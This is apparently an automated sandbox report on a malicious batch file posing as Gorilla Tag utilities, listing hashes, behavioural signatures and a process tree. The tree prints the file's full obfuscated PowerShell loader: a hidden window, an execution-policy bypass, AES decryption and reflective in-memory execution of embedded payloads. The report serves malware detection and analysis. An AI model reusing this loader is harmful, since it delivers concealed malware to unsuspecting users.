Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
03/05/2024, 12:28
Static task
static1
Behavioral task
behavioral1
Sample
$77GorillaTagUtillitiesBETA.bat
Resource
win7-20240215-en
5 signatures
300 seconds
Behavioral task
behavioral2
Sample
$77GorillaTagUtillitiesBETA.bat
Resource
win10v2004-20240419-en
23 signatures
300 seconds
General
-
Target
$77GorillaTagUtillitiesBETA.bat
-
Size
267KB
-
MD5
b73ef489617145823323c8680c0cf926
-
SHA1
ae9f2c40ec173eab247553e1c63998a2bccf8040
-
SHA256
92d971fa9d2c006488924e5ec81bf79e9bac6c7028b2dfdd4a553b59e3ef3660
-
SHA512
0a6a558d2b164e6fa46dc70b0b4ff40358db1288dc6fa00609416aaca3dd48b94c8d76eac1505c7190aba8712dd77e3adbc31047a93046f61b69a023778bf44a
-
SSDEEP
6144:c4zAEw+MPkt62Um6GQZM4SjcVO9Bfpk4XbPIh6:c4zZwTP4ChxBicVxSbE6
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1924 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1924 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1764 wrote to memory of 380 1764 cmd.exe 29 PID 1764 wrote to memory of 380 1764 cmd.exe 29 PID 1764 wrote to memory of 380 1764 cmd.exe 29 PID 380 wrote to memory of 2936 380 net.exe 30 PID 380 wrote to memory of 2936 380 net.exe 30 PID 380 wrote to memory of 2936 380 net.exe 30 PID 1764 wrote to memory of 1924 1764 cmd.exe 31 PID 1764 wrote to memory of 1924 1764 cmd.exe 31 PID 1764 wrote to memory of 1924 1764 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$77GorillaTagUtillitiesBETA.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('igimhidT1w9X9vR9LV3GYpqFJfxUYKagKL4RbRUSjPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('63fsnRenOi4+F2QVs65EJQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XHxNc=New-Object System.IO.MemoryStream(,$param_var); $UmBxO=New-Object System.IO.MemoryStream; $MfsxI=New-Object System.IO.Compression.GZipStream($XHxNc, [IO.Compression.CompressionMode]::Decompress); $MfsxI.CopyTo($UmBxO); $MfsxI.Dispose(); $XHxNc.Dispose(); $UmBxO.Dispose(); $UmBxO.ToArray();}function execute_function($param_var,$param2_var){ $xFPAd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $knMoI=$xFPAd.EntryPoint; $knMoI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77GorillaTagUtillitiesBETA.bat';$lMjyu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77GorillaTagUtillitiesBETA.bat').Split([Environment]::NewLine);foreach ($WAAwD in $lMjyu) { if ($WAAwD.StartsWith(':: ')) { $fTAft=$WAAwD.Substring(3); break; }}$payloads_var=[string[]]$fTAft.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-